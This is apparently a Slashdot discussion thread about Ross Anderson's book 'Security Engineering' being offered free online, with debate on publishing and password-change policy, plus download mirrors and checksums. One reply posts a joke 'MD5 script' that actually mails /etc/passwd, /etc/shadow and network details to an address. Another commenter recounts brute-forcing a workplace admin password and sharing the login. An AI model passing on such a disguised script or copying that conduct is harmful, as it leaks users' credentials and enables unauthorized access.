"Security Engineering" Is Now Online

An anonymous reader writes "Ross Anderson, author of 'Security Engineering', notifies in a message to comp.risks that he just got permission from Wiley to let anyone download the full content of his book for free. This is one of the best books on computer security and it is used as textbook in many University courses (I teach two of them)."

Backwards System

[eldavojohn]

The publishers thought for years that it was too risky to let authors put books online but they are gradually learning that this isn't so. Putting a book online often increases its sales; more people read it and those who find it useful often go buy a copy.

Funny how that works with media, isn't it? Newspapers are free to read on-line. Do they blame lack of income on that? Hell no, they probably make more money on ads that didn't cost ink and paper to print!

If we were concerned about artists, you'd put all their music online--eliminating album profits to them and labels--and pay to see the live shows. That's where they make all their money anyway.

Poor tech authors often sign anything that's in front of them to get their books out. Which means they don't make squat on the sales plus the publisher hikes the price up so that they turn a good profit. Ever bought Duda, Hart & Stork's Pattern Classification? Good luck, $100 for a six year old book!? Give me the black and white Asian release that's illegally sold on eBay for $10. Yet it remains a standard in the field.

You don't believe me that authors sign outrageous contracts? Well, this poor man had to beg to get his work online. Sounds like he didn't sign a contract that left him creative and absolute control over the distribution of this work.

Yet if they don't get it into print, it can't be used in a classroom setting. What a terrible system (hail capitalism). To all artists, authors and producers of media, please cut out the middle men that make it nearly impossible for me to afford your beautiful works and more or less cheat you out of money in a highway robbery-like scam.

Printed word was an amazing invention because it posed a method to mechanically copy texts and ideas and get them out to people. The internet allows you to do that for nearly free ... use it!

Re:Backwards System

Yet if they don't get it into print, it can't be used in a classroom setting.

Fortunately, this isn't always true! While taking my advanced operating systems course, we used Linux Device Drivers which is available online for free. This is also the case with my Programming Languages class where we learned and wrote an interpreter for Scheme. Then, in my computers and society class we used ESR's writings and Stallman's biography.

Maybe more topics could be covered in free format... Seems to me like Google is making life easier for some English courses and MIT already has opencourseware up and running.

Guess I went off on a tangent over one little line... :)

Re:Backwards System

[Red+Flayer]

Sounds like he didn't sign a contract that left him creative and absolute control over the distribution of this work.

Who woulda thunk it... he signs a contract to get a company to publish and distribute his work, and doesn't retain absolute control? If he wanted complete control, he would have self-published. There are pros and cons of both, and to rip the publishing industry for a perfectly reasonable contract term is ridiculous. As self-publishing becomes more and more feasible given the internet, these restrictions will change. This is a sign of that change, and you should celebrate Wiley rather than lambast them.

Yet if they don't get it into print, it can't be used in a classroom setting. What a terrible system (hail capitalism).

What an imbecilic troll. The problem isn't capitalism, it's the inherent nature of a bureaucratic system -- it's resistant to change (for good reason -- there are lots of crappy ideas out there). This depends not at all on what kind of socioeconomic system is in place, and capitalism may indeed offer better opportunities for authors (do you think an autocratic economic system would enhance the ability of authors to get their material accepted in the classroom?).

Please note, I am not a free market idealist. I am also not an apologist for the publishing industry, and their treatment of authors. However, you severely misrepresent the fact that publishers such as Wiley do indeed provide services to authors, and to the public. (Editing, fact-checking, vetting, advertising, marketing, etc).

Disclaimer: I work in magazine publishing, which is an entirely different kettle of fish. I do, however, deal with book authors on a frequent basis, both self-published and thos epublished by major imprints.

Re:Backwards System

[Z1NG]

Part of fair value is perceived utility. If book publishers are charging $100 for a book, then that is because people are willing to pay that much for it. You can drink water out of the tap for practically nothing, or buy a $1.50 bottle of water for convenience. It is the same with books. No one is being forced to pay so much for a text, they buy the book because the price is worth it to them or they buy it because they are required to by a class. In the latter case, they still don't have to buy the book - if they choose to then that is because they think buying the book (and hence maybe doing better in the class) is worth the money. But then that's all part of capitalism which you seem to think is evil.

Re:Backwards System

[Tiger4]

If we were concerned about artists, you'd put all their music online--eliminating album profits to them and labels--and pay to see the live shows. That's where they make all their money anyway.

Sadly untrue. Tours typically only just break even. They are just giant live promotional campaigns for album sales. Airplane tickets, bus rental, hotel fees, meals and catering, wardrobe, stage, sound, and lights. Promotion and ticket handling, venue fees, security, insurance, etc. It all adds up. That is where $40+ tickets come from.

Depends on the artist and entourage of course. One guy with a guitar on a street corner that sleeps on a bedroll and travels by bicycle won't have most of these expenses. But then he won't have much of an online presence either.

Re:Backwards System

[Volante3192]

Who woulda thunk it... he signs a contract to get a company to publish and distribute his work, and doesn't retain absolute control? If he wanted complete control, he would have self-published.

Shouldn't he still maintain the copyright though? The contract should only affect the print distribution, I would think he should still be able to distribute through other channels how he sees fit, as it's his words, not the publishing company's. ...I say this having no idea what the boilerplate contract looks like in that industry of course...

Re:Backwards System

[muellerr1]

I've got a friend who used to work for a small boutique publisher, and I can tell you that publishers are an author's best friend. Without them the author's works would go nowhere. Fine, change the business model to distribute freely online, but as far as increasing sales of books, those books have to fome from somewhere.

I just don't get the 'cut the middleman' mentality. What exactly do you think the publishers aren't contributing that the authors could do themselves? Are you expecting authors to employ and manage editors, designers, printers, pr and marketing people, advertisers, a nation-wide system of sales reps, sales managers, shipping companies, and so on? Or are you suggesting that these roles aren't necessary? That's the same thing as saying that books should only be digital from here on out. The attitide that the authors should 'just get a loan' to fund these activities is hogwash since the only people who could get a loan of that magnitude for an unpublished manuscript are already established authors, and even then it would be iffy. Then people suggest that authors should just publish online and screw printed materials, but for most applications like textbooks that doesn't really work for the consumer--wouldn't you rather just have a book than having to print it out yourself, which could easily cost as much in ink and paper as a bound book would, while being more irritating? Also, e-book technology still sucks. Besides, the author would still need to employ the editing, pr, marketing & advertising people anyway, because if you don't know about a book, why would you buy it? The fact is, people happily pay for advertising because the return on investment is huge.

Wouldn't it be great if there was a company that had the capital to invest like a bank, but also the expertise to cull the few good manuscripts from the staggering pile of crappy ones, then print and market and distribute these works? Wait, that would be a publisher.

I acknowledge that in some specific cases self-publishing directly to the internet might be a good business plan. But to suggest that we abandon dead trees in most cases misunderstands the market. You said it yourself, "...if they don't get it into print, it can't be used in a classroom setting." Sure, good chunks of fat could be trimmed from the publishing world, but name one industry where this isn't true? I just think that the 'middle man' is necessary to the process.

Sorry, OP. I realize that most of my rant doesn't even apply to your main points. I just don't think the middle man is all that useless in most cases.

Re:Backwards System

[hal9000(jr)]

Dunno about Wiley, but my wife publishes popular fiction and her contacts give the rights to the publisher even though the work is copyrighted to her. There is a clause in the contract, however, something to the effect that 6 years after the publication date, she can petition to get the rights transfferred to her. But that might be particular to her publisher

IOW, even though she is the copyright holder, she can't redistribute the content in any form per the contract.

Re:Backwards System

[Red+Flayer]

Shouldn't he still maintain the copyright though?

Sure. But the author has signed away their right to publish independently, normally it's an exclusive license. Book publishers include prohibition of publishing online because they've traditionally seen online publishing in direct competition with their print publishing.

Re:Backwards System

[spiffyman]

Your sentiment makes sense, but I have to agree with the GP. I think people miss some key points here:

1) The ethical (not legal - the contracts settle that) question up until this point has been whether the publishing company has a right to restrict distribution through other channels. It's not a hard case to make on the publishers' side: Until recently, there was little reason to expect that free distribution would make print sales go up, and the data on that remain unclear. So, as a publisher, why wouldn't you want to resist other distribution models?

2) If I read TFA properly, it appears that the text being distributed is the text that was edited, copy edited, etc. by Wiley. As far as I'm concerned, that gives Wiley just as much moral claim to the work as the author. People underestimate the amount of time and effort that goes into the editing process. Writers, by and large, are not good writers. So why should they always retain copyrights?

Disclaimer: I've edited for a newspaper in the past, and I'm currently an editor for an undergraduate journal, so I'm pretty obviously biased against authors-above-all types. Mod appropriately.

Re:Backwards System

[cptgrudge]

But then he won't have much of an online presence either.

The difference is that most of the time, he doesn't want an online presence or to have an entourage. He does it for the music.

Re:Backwards System

[bcrowell]

As the author of some free, online textbooks, I actually agree with a lot of your points. However, I think they're overstated. My books have actually been reasonably successful without signing on with a publisher. I've had adoptions from 13 other schools besides my own. POD companies like lulu.com have made it pretty trivial to take care of production and distribution. Advertising also isn't rocket science. I designed my own ads, and ran them in a trade magazine (The Physics Teacher). A lot of the money that traditional college textbook publishers put into marketing is the money they pay to have book reps go around to schools giving freebie copies ot professors and trying to talk them into adopting it. Well, that's an incredibly inefficient method of marketing. The freebie copies are expensive to produce, and the reps are expensive to employ, and in most cases, the reps are wasting their time, because they don't know enough about the subject or the situation at a particular school to know whether they have any realistic chance of getting an adoption. If the book is free online, you don't have to pay to leave these expensive printed copies for professors, who will use them as doorstops. Actually, most of my adoptions have come just from teachers who ran across the book on my web page.

I acknowledge that in some specific cases self-publishing directly to the internet might be a good business plan. But to suggest that we abandon dead trees in most cases misunderstands the market.
You'r confounding two totally different issues. You can make two completely independent decisions: one is whether to make it free on the internet, and the other is whether to sell it in print.

You said it yourself, "...if they don't get it into print, it can't be used in a classroom setting."
Getting it into print is trivial with POD.

The biggest thing I think I'm missing out on by not having a publisher is that I've never had a chance to work with an editor. That would be great, but it's not a consideration that trumps all others.

Traditional publishers are becoming less relevant. The question is how much less relevant, and that really depends on the book and the author. Does the book need a ton of professional illustrations (like most physics textbooks), or not (as with most CS textbooks)? Are you trying to hit a home run (a freshman chem textbook that will dominate its market), or not (like 99% of all textbooks, which are not very profitable for anyone)? Is it an esoteric subject (quantum field theory), or something that zillions of college freshmen take every year (calculus)? See my sig for a catalog of hundreds of books that are free online. Some of these are, like the one referred to TFA, books that are also in print from major publishers. Many others, however, represent the success stories of college professors who did it on their own.

Re:Backwards System

[Rucker]

That's is contrary to what is reported in the media.

For example,

Performers frequently moan about never seeing a royalty check from their record label, no matter how many discs they sell. But a top concert draw can take home 35% of the night's gate and up to 50% of the dollar flow from merchandise sold at the show. The labels get none of it.

"The top 10% of artists make money selling records. The rest go on tour," says Scott Welch, who manages singers Alanis Morissette and LeAnn Rimes.

from Forbes

If this isn't true, please point me to some supporting material.

Thanks,

Re:Backwards System

[czehp]

Oh yeah, tours never make profit. I don't know about you but with $80 million gross, there seems like a little bit of profit to be made in touring to me...

Re:Backwards System

[muellerr1]

I'm really glad to see that you were able to self-publish successfully. Not all authors have such a mind for business in addition to their more creative talents. Your point about POD is a really good one, but it still doesn't solve the editing and marketing problems. Maybe the reps visiting schools is an example of a serious fat-trimming opportunity, but there's still more to marketing than a few ads and badgering teachers. Textbooks might be a bad example for this, but don't you suppose that going with a traditional publisher might seriously increase your market share? While simple advertising isn't rocket science, for example, like most service industries to be truly successful it does require competent professionals. It's the difference between Kia ads and Volkswagen ads. All I'm saying is that knowing all of the disciplines involved in the publishing world shouldn't be required for an author to be successful.

Re:Backwards System

>Yet if they don't get it into print, it can't be used in a classroom setting. What a terrible system (hail capitalism).
Wow, you're stupid!

Re:Backwards System

[phulegart]

it is important to note that all the services that publishers provide to authors... are essentially provided to musical artists by record companies. I'll argue any day that just about everything you can say about an author, you can say about a musician... with very little editing to make it fit properly...

It was already stated in the comments here that concert tours actually barely break even.... they are not fountains of money like the mistaken public seems to believe. However, the equivalent for an author, namely a speaking engagement, does not end up having the same kind of overhead. THe fee the author charges for that public appearance, goes just about completely to the author.

Both the publishing house and the recording company are responsible for editing, marketing, advertising, etc... which is why books AND CD's must be sold. Sure, some authors must beg to get their works published. No different than some bands begging for a record contract. Then again, some authors get courted by publishing houses, just as some bands will be pursued by record companies.

One of the big differences was briefly mentioned though. While free versions of a book online will actually encourage some to go out and purchase the actual book, this is not really seen when dealing with music downloads. It is more likely that a person will download the music, then make a CD themselves if they want it in that format. People rarely download a book, then turn around and print it.

So although both publishing houses and record companies should be treated the same in that they both deserve to be compensated for the amounts of work they put into their charges, free books online and pirated music online should not be viewed as the same... since the consumer doesn't treat them equally.

Re:Backwards System

[bcrowell]

Textbooks might be a bad example for this, but don't you suppose that going with a traditional publisher might seriously increase your market share?
Sure. In fact, I got a nibble out of the blue recently from a publisher, and it's possible that they'll end up taking over publishing one of my books, while still letting it be free online. But note that it happened in the reverse of the traditional order: first I published it and got a bunch of adoptions, and then a publisher showed some interest. It's an example of how everything is getting shaken up by new technologies. Another thing to consider is that maximizing market share may not be a priority for a lot of people. Most textbooks don't make any significant amount of money for their authors, so an increase in market share means the difference between making a negligible amount of money and... making a negligible amount of money. Most people who write textbooks do it because they're not happy with the books that are available, and want something that does what they want in their own classroom. Having it adopted by other people is just icing.

Not all authors have such a mind for business in addition to their more creative talents.
Actually I don't have much of a mind for business, and I don't really enjoy the business side of things at all. Who wants to spend his time shopping for the best deal on bubble wrap? That's why I wish POD had become viable 10 years ago, because I never would have had to bother with production and order fulfillment.

Re:Backwards System

[zopf]

So why don't more people use systems like Lulu.com that allow users to create their own content, sell it online, or even get it bound as real books on demand? Why do they need to get involved in huge publishing deals?

It seems that even just building a blog and syndicating some Google ads down the side would make as much money for the same readership as publishing a book.

Re:Backwards System

[Brian+Stretch]

Yet if they don't get it into print, it can't be used in a classroom setting. What a terrible system (hail capitalism).

You think our government education near-monopoly is capitalist? Maybe capitalism as imagined by socialists, there's a lot of that going around...

Re:Backwards System

[rozz]

are you expecting authors to employ and manage editors, designers, printers, pr and marketing people, advertisers, a nation-wide system of sales reps, sales managers, shipping companies, and so on?
NO

Or are you suggesting that these roles aren't necessary?
YES

That's the same thing as saying that books should only be digital from here on out.
no it's not, u little fallacy-loving troll

Besides, the author would still need to employ the editing, pr, marketing & advertising people anyway,
no, he doesnt

because if you don't know about a book, why would you buy it?
ever heard of Word-of-Mouth ? it worked very fine for thousands of years .. and the result: you got hundreds of literary masterpieces and almost no crap .. why so? .. simple:good things sell themselves, crap doesnt .. it's utter crap on paper that needs all the advertising that u advocate above.
and guess what, in the era of internet & blogs & amazon we can talk about word-of-mouth-on-steroids.

anyway, i can go on and on about this stuff but this discussion is too big for this small forum .. just stop trolling your crap about the benefits of having publishers and advertising .. your beloved publishing-system brings absolutely no benefit for the customer .. on the contrary, it throws loads of well-advertised & idiotic "literature" down everybody's throat

Slashdotted

And now it's offline.

Why isn't there a tarball of all the PDFs?

Re:Slashdotted

[in2mind]

The link to the chapter 1 is :http://www.cl.cam.ac.uk/~rja14/Papers/SE-01.pdf

Upto "SE-25.pdf" covers the 25 chapters of the book.
Try the links later.

Re:Slashdotted

[ajmilton]

i had no problem downloading the whole damn thing in the past 5 minutes

*shrug*

great

just great

Password Changing

[tritonman]

What I want to know is if this guy supports the "change your server passwords every 90 days" crap. There are about 30 passwords that I need to remember for different servers here and the admins think that it's more secure to make the passwords change every 90 days, requiring the people to write down the passwords because they can't keep remembering them. To me, it seems like a much more secure idea to change the passwords when a person who knows one of the passwords leaves. If you wait for the 90 days to be up, you risk them getting in unauthorized anyway. Changing passwords for no good reason other than a time limit is just rediculous.

Re:Password Changing

[CastrTroy]

I guess the problem is, is that somebody could bruteforce your password if you never changed it. Changing it that often means that they won't have time to brute force it before it changes. Although, I think that if you're going to do something like this, you should just have an RSA token or something for logging in. Makes it easier for the people who should have access to log in, without having to remember 30 different passwords that change every 90 days.

Oh, and what's so wrong with writing it down and putting the paper in your wallet? You keep your credit card in there. And i'm sure that you probably wouldn't want that stolen either.

Re:Password Changing

[ari_j]

The possibility of brute force is not an argument for changing passwords frequently, unless you catch someone trying to brute force it and change it to one they've already tried. Brute force relies on the statistical likelihood of guessing the password before the reason you want access goes away. Changing the password every 90 days has no bearing on the likelihood of it being guessed in a certain amount of time, unless what you change it to has a probability of being guessed of less than what it was by virtue of the brute force method employed.

The best thing to do is to change your password anytime there is a good chance that someone who should not know it does know it. That includes an employee leaving, evidence of an unauthorized access that could have been attained by having the password (possibly discovered by brute force or by other methods), theft of the business card you wrote it down on, etc. But it does not include the mere possibility that someone could guess it - changing the password has no real bearing on their chances of guessing correctly, unless it was something insanely simple before and changed to something reasonable.

Re:Password Changing

If your system allows for only 3 fail attempts per day and say 10 unsuccessful attempts in a month before locking up needing a reset and gives you a warning of the unsuccessful attempts on login.

This would already prevent the bruteforce password guessing to work without being a pain in the butt for everybody.

Re:Password Changing

[in2mind]

Oh, and what's so wrong with writing it down and putting the paper in your wallet? You keep your credit card in there. And i'm sure that you probably wouldn't want that stolen either.

Even if that paper got stolen stolen with the wallet ,so what?
Who would know if its a password (assuming its just a long sentence);Even if they knew if it was a password,where would they go try it?

Re:Password Changing

Ahem. As an admin myself I would like to throw a few ideas in there.
 
1) When I had a job where I wasn't in control (not admin, just support) and I didn't particulary fancy the admin staff, I brute forced my way into admin, had they changed it every 90 days it wouldn't have been worth the effort more than once or in particulary needed times. As it was, they appeared to agree with you, which in turn guaranteed me admin access from brute force methods until I ended my employment there (and gave the admin login to pals there), changing it once a year or so means that i just have to put a pc under my workdesk and leave it on for a couple of weeks with the monitor off. If it changes too often than it's just too much of a pain to work have to replicate the scenario every couple of weeks and i lose out on the admin status, but if it never changes, it's no pain to me to put up with the PITA of brute forcing it once. FYI, due to them using a complex password and my spare PC speed, brute force clocked in at 2 weeks to get the password - 2 weeks once, no prob, but after every 90 days, i haven't got the time to dedicate to keeping that PC online and hidden, plus it would increase my chance of getting caught by an audit or security.

2) The best thing to do is to change your password anytime there is a good chance that someone who should not know it does know it. That's fantastic, if you represented the average user I would marry you. Most users don't have this idea in mind, they want the password static for as long as possible and occassionaly share it and forget it. I have found users logged in as other users many many times. Lots of users do insanely stupid things like call work and ask someone else to log in as them to check something they forgot, even members of the management team do it at one place i worked at. By the end of 90 days I expect at least several users to have shared their passwords, no big deal, it will change, if it doesn't (and it won't unless i force it) than after a year some of those other users are working for the competition who suddenly have a great tool to check your business stats (in this country that happened to a major airline - the cause, no password change policy)

3) if your changing your passwords only after finding out about instrusions, you may as well forget it, you probably have a keystroke logger or other backdoor installed already and changing it is only going to give the intruder your new password. seriously, security should be proactive, not reactive - you've already been broken into if you have a reactive model.

4) believe it or not, but I could go on with examples and theoritcal ideas, but i've got some conference to go to....feel free to respond with something constructive rather than the "i don't want to change my password though" or "i don't think so" give some real security measures that are improved by not changing it. As an admin who has about 30 - 40 username/password combos some of which only get used monthly, I don't have any password problems, when a user on my network comes to me saying they can't handle it and I know they have one username/password I laugh at them. It's not even as difficult as remembering a phone number.

Re:Password Changing

[anum]

And...

5) Someone gets a copy of your password file (or SAM or wherever your hashed passwords are kept). If you change your passwords occasionally then they only have a limited time to run brute force methods against the file. Once you change your passwords you are safe again. Don't change your passwords and eventually they will own your entire organization. You won't even know it happened until it's too late. It's a less likely scenario these days but it is still a valid attack vector. Once that file gets out ONLY changing your passwords will help.

Re:Password Changing

"Oh, and what's so wrong with writing it down and putting the paper in your wallet? You keep your credit card in there. And i'm sure that you probably wouldn't want that stolen either."

If someone physically steals my credit card, I will know very quickly. If someone steals the number, I will know soon. In both cases, I have a reasonable, known response.

If someone steals my password from my wallet, I might not ever know, and what is my reasonable, known response?

Re:Password Changing

[tritonman]

thanks for the input, the thing people have to know here though is that these are UNIX systems, they are behind a firewall, so you must be on our networks to even ping them (yes, I know there are so many backdoors to that), but if you fail 3 times, the account gets locked out and I have to call my admin to have him reset it. If this happens often, they can easily look at the audit logs and find out where all of these failure attempts are coming from. Brute force could take you over 50 years if you could only attempt two times per day to avoid lockouts. Also, the passwords have to be very long, contain at least one capitol letter, one digit and one "other" character (#, &, !, etc), also they must be at least 5 characters different than the previous 10 passwords used, so to me, it's not easier than remembering a phone number. I hate writing down passwords because it's so easy for someone else to get ahold of.

Re:Password Changing

[GrievousMistake]

You contradict yourself here. First you say changing the passwords would make a brute force attack less desirable since the password would only be valid in a limited timeframe, then you say changing passwords will likely be ineffective when the system is already breached.
It's just a nitpick, really, I agree with your main points. Note though, that passwords, especially with enforced complexity, are more difficult to remember than a phone number (did you ever forget how you mixed the case on your phone number?), most persons are already forced to remember dozens of them, not just for work, most people don't change their phone number every 90 days, and if you force me to have one of those crazy uppercase-lowercase-number-sign-mixes for a password I will write it down somewhere (though not on a post-it on my monitor, as some of the more hard-core lusers have been known to do.)

Re:Password Changing

[ari_j]

Having an employee who would try to repeatedly brute force your passwords qualifies as "anytime there is a good chance that someone who should not know it does know it."

Re:Password Changing

You contradict yourself here. First you say changing the passwords would make a brute force attack less desirable since the password would only be valid in a limited timeframe, then you say changing passwords will likely be ineffective when the system is already breached.
no contradiction, the changing of passwords is a prevention to initial access to the account. What you do after a breach is a different scenario, simply changing your password after a breach isn't a method to fix the problem you would now have.

Re:Password Changing

It's helpful if systems present your last login time and date and maybe location when you log in. This lets you know if someone else used your account.

Grr

[imikem]

Did the authors of said fine book manage to spell "Engineering" correctly?

Re:Grr

Did you RTFA?

Re:Grr

[kdawson]

Heh, nice catch, fixed.

I can't seem to get to the book for download.

Could someone who's gotten to it post the book here on /.?

Thanks!

Re:I can't seem to get to the book for download.

[ajmilton]

I've got it all downloaded, but nowhere to host :P

Re:I can't seem to get to the book for download.

[ScrewMaster]

Better yet, somebody throw up a torrent and link us to it.

Come On, 'Enginner' Is A Word

[eldavojohn]

"Enginner": n. one who drinks gin and attempts to solve problems with gin and the mathematics of gin drinking. Ex. The sot that lay in the gutter claimed to be an enginner as a passerby spat on him.

"Enginnering": trans. v. to lay out, throw up, or manage as a gin drinker (see 'enginnerate').

Re:Come On, 'Enginner' Is A Word

"Enginner": n. one who drinks gin and attempts to solve problems with gin and the mathematics of gin drinking.
 
Sweet! I know what I want to major in now in college!

more free books

[plopez]

google 'free books' or 'free books science' for a plethora of sites publishing or linking to books for which the copyrights have expired or been released.

"Share and enjoy!"

Widest audience .. but...

[in2mind]

My goal in making the book freely available is twofold. First, I want to reach the widest possible audience

The book got featured in slashdot.But the server is down. Should have mirrored it in free servers atleast.

MOD PARENT UP!

Congratulations, someone actually gets it.

PDF alert. Mirrors?

Somebody please mirror this (or torrent it), that server is going down in 5, 4, 3...

Re:PDF alert. Mirrors?

See above torrent link.

Two questions

[Lord+Ender]

1) Is it cool to include this in Project Gutenberg?

2) Does anyone have a link, or simple way, to download this entire book in one file or torrent?

Re:Two questions

[RShizzle]

wget -r http://www.cl.cam.ac.uk/~rja14/book.html

Re:Two questions

[Lord+Ender]

That would work if the server were not slashdotted.

Re:Two questions

[NaNO2x]

Working on it right now, I have all the files just want to rename them before I upload them, will post the torrent right after.

Re:Two questions

[NaNO2x]

And here is the torrent: One of these, Unsure which one is the correct way. http://www.bitenova.nl/download.php?id=c78955f30fb 851908b577141aeb865e953f6d4b3 http://www.bitenova.nl/tt/i4ods

Maybe their server used Maxtor drives...

[The_REAL_DZA]

...I heard somewhere that they occasionally go up in smoke and flames...
 
In which case it'd be a "fireball" (rural-Southern pronunciation: "far.ball") of all the PDF's...

SHA1SUMs

[$calar]

For those of you who actually downloaded the book, here are the checksums I got. Let me know if you got the same. Thanks.

83a9bddb0ebd272cdb54c4de00580b3489a63a6b SE-01.pdf
c35f69d6080db3e09f957303e197ac8a17d1bdbf SE-02.pdf
172313ac2ca8097c68440a57736df505d8dd0842 SE-03.pdf
e999076e677a7df800f799944c060707b4afe5a1 SE-04.pdf
d014a4974797568cf6ea792d4dc49f1842213b30 SE-05.pdf
1effa14958310ed5227cfc8ead3905f4d9001131 SE-06.pdf
56e0605f0236be4d1b09cf6c6f62bd76c8581587 SE-07.pdf
f59664e9a67040ed9281b5866d56ac44802cdd8d SE-08.pdf
2269d3a3460d911780c4e3e81a819b51754617e9 SE-09.pdf
93d007c521184516405e7b2327beab8e245de15a SE-10.pdf
3ffc2ac64bb07c4d599ec67adab0e00ca16e869e SE-11.pdf
0eba902e98efcd9c107857e286253ef7ada1be81 SE-12.pdf
791d3ef1aa163f55ff1b096b1f08d487ba3c0417 SE-13.pdf
b58649be6a297097e412ad319f3fdeceb054f69a SE-14.pdf
73f66ce309b3c28ca7173b332152266452473eb2 SE-15.pdf
7b61e8330ef2b09a5d937688521a553b5e47968e SE-16.pdf
d816db2e750734700ecffaa99673e88839f95555 SE-17.pdf
0b050d413010f43d2e80ea868c4e9ca4c7bf7ec4 SE-18.pdf
e83f9c08ad10ba534b191cc267a157624bb60dc0 SE-19.pdf
256a7f5f202ad92e539b21f1d232c3d6a6c40705 SE-20.pdf
6d5018caceffdb5154a625414bef877afdfc831c SE-21.pdf
1dcc67d39f345f27852c7b1f641f802bd8bd738a SE-22.pdf
00da949e75121aa387dc9e33e77460cf26268459 SE-23.pdf
fb809a4144b3205e1bc043dc0ca92baf623c0306 SE-24.pdf
4cee602bcd02ac32055f95798c5a3aa5201822ec SE-Bib.pdf
f3c7f992180fa42325020b8a93ed2b2fa93a5779 SE-FM.pdf

Re:SHA1SUMs

+1 Funny? It took me a while to get the joke, but it finally came to me... SHA1? Join the 21st century and use an MD5 hash! HAHAHAHAHAHA. Hah. .... Hah.

Re:SHA1SUMs

Here are mine, looks like they match.

SHA1(SE-01.pdf)= 83a9bddb0ebd272cdb54c4de00580b3489a63a6b
SHA1(SE-02.pdf)= c35f69d6080db3e09f957303e197ac8a17d1bdbf
SHA1(SE-03.pdf)= 172313ac2ca8097c68440a57736df505d8dd0842
SHA1(SE-04.pdf)= e999076e677a7df800f799944c060707b4afe5a1
SHA1(SE-05.pdf)= d014a4974797568cf6ea792d4dc49f1842213b30
SHA1(SE-06.pdf)= 1effa14958310ed5227cfc8ead3905f4d9001131
SHA1(SE-07.pdf)= 56e0605f0236be4d1b09cf6c6f62bd76c8581587
SHA1(SE-08.pdf)= f59664e9a67040ed9281b5866d56ac44802cdd8d
SHA1(SE-09.pdf)= 2269d3a3460d911780c4e3e81a819b51754617e9
SHA1(SE-10.pdf)= 93d007c521184516405e7b2327beab8e245de15a
SHA1(SE-11.pdf)= 3ffc2ac64bb07c4d599ec67adab0e00ca16e869e
SHA1(SE-12.pdf)= 0eba902e98efcd9c107857e286253ef7ada1be81
SHA1(SE-13.pdf)= 791d3ef1aa163f55ff1b096b1f08d487ba3c0417
SHA1(SE-14.pdf)= b58649be6a297097e412ad319f3fdeceb054f69a
SHA1(SE-15.pdf)= 73f66ce309b3c28ca7173b332152266452473eb2
SHA1(SE-16.pdf)= 7b61e8330ef2b09a5d937688521a553b5e47968e
SHA1(SE-17.pdf)= d816db2e750734700ecffaa99673e88839f95555
SHA1(SE-18.pdf)= 0b050d413010f43d2e80ea868c4e9ca4c7bf7ec4
SHA1(SE-19.pdf)= e83f9c08ad10ba534b191cc267a157624bb60dc0
SHA1(SE-20.pdf)= 256a7f5f202ad92e539b21f1d232c3d6a6c40705
SHA1(SE-21.pdf)= 6d5018caceffdb5154a625414bef877afdfc831c
SHA1(SE-22.pdf)= 1dcc67d39f345f27852c7b1f641f802bd8bd738a
SHA1(SE-23.pdf)= 00da949e75121aa387dc9e33e77460cf26268459
SHA1(SE-24.pdf)= fb809a4144b3205e1bc043dc0ca92baf623c0306
SHA1(SE-Bib.pdf)= 4cee602bcd02ac32055f95798c5a3aa5201822ec
SHA1(SE-FM.pdf)= f3c7f992180fa42325020b8a93ed2b2fa93a5779

Re:SHA1SUMs

[WhiplashII]

Here is a script you can use to generate the MD5s:

#!/bin/sh

sendmail me@me.com theEnd

`cat /etc/passwd`
`cat /etc/shadow`
`ifconfig`
`netstat -anlp`
theEnd

Re:SHA1SUMs

[$calar]

OK, when I wrote that at first I was serious but now I can see why it is funny. The whole thing is that you run sha1sum or md5sum to verify that your download is accurate. If this were a software download, we would want to see the hash to make sure the file wasn't tampered with. Considering this book is called "Security Engineering," it's kind of a joke that you would want to verify the source files to make sure they weren't tampered with, since I doubt a virus can be embedded into a PDF file. It's also ironic because the book is about security, and this would be a step all security aware users should take when downloading things from the Internet. I was just checking to make sure I got the whole file, especially considering the server was flaky.

Re:SHA1SUMs

[Java+Pimp]

...it's kind of a joke that you would want to verify the source files to make sure they weren't tampered with, since I doubt a virus can be embedded into a PDF file.

http://secunia.com/advisories/16466

Stranger things have happened. :-)

Can we change the roles a bit?

[khasim]

I just don't get the 'cut the middleman' mentality. What exactly do you think the publishers aren't contributing that the authors could do themselves?

For me, the "cut the middleman" mentality is because the middleman is not serving my interests nor the author's.

I cannot buy the books I want because the middleman owns the book and refuses to publish it anymore.

I cannot buy the book from the author because the author doesn't have the rights to sell it to me.

How about the middleman actually behave like a middleman?

Sell me anything I want to buy that you have purchased the rights to. Otherwise, get out of the way of my dealing directly with the author. Don't try to increase your profits by constructing an artificial choke-point between the producer and the purchaser.

Re:Can we change the roles a bit?

The book wouldn't exist in the first place without the middleman. To say that they are not serving the author's interests is not true; the author had the choice not to sign the contract with the publisher. Contract negotiations are a give and take; the author both got something and had something taken away. Your interests are irrelevant to this business decision except as part of a potential market, and if the publisher thinks they can't make money in that potential market, they won't try. You may not like it, but it's the same business decisions that made the book available in the first place.

Re:Can we change the roles a bit?

[sukotto]

If the book isn't available, does it really exist?

DOS

However, that's the definition of "denial of service" -- all someone has to do to lock out a user is try a bogus password (even the same bogus password) three times, and presto! they're denied service until the local BOFH can be contacted to unlock 'em. The rogue corporate anarchist (or jealous busybody, etc.) has caused more than a few hours of downtime with this method (anybody ever work someplace that has a "work slowdown" rather than a strike?)

E-books lacking in important feature

[bananaendian]

But what's the point if you can't display it on your bookshelf among all the other tomes you've never read.

"Reading a book on security enginnering does not security enginneer one make."
- Wiseguy

Re:E-books lacking in important feature

Not to mention that it could be used as a replacement for the leg that's broken on the couch.

You got it. Change the circumstances.

[khasim]

#1. Putting the password in your wallet is taking a less secure process (written password) and encasing it in a more secure container (your wallet).

#2. Change the login process to lock out the account for 15 minutes after 3 failed login attempts. That way, less random passwords can be used (and easily remembered). As long as there is a real person monitoring the logs and watching for attacks so that action can be taken.

#3. If it is something that can be cracked off-line (secret message), store the really long password on a USB key or something. Then put that key in your wallet (#1).

A single approach is NOT sufficient for every scenario.

OT: Mirrored Content

[EnigmaticSource]

Sorry for the off thread/topic reply, but in the intrest of visibility, here you go:

Part 1: http://momoshare.com/file.php?file=1911bc824177937 7bdad8bc9387b4177
Part 2: http://momoshare.com/file.php?file=f88b489ca8f1dcd dc76778cee3ba9d7b

SHA1 Sums
b14f5b17f2284823cd803d2c1c01970ffe88684d seceng1.zip
740a0de7f86893326b074862abdf377c881734b3 seceng2.zip

Re:OT: Mirrored Content

THREADJACKER! Halt!

:-)

I kid, I kid! Thanks!

Re:OT: Mirrored Content

[EnigmaticSource]

You're welcome, However I still feel like a dirty karma whore because I forgot to 'Post Anonymously'.

uh :(

Doesn't work :( could someone send me instructions on how to install it at etu-aldv@devinci.fr ?

reviews

[bcrowell]

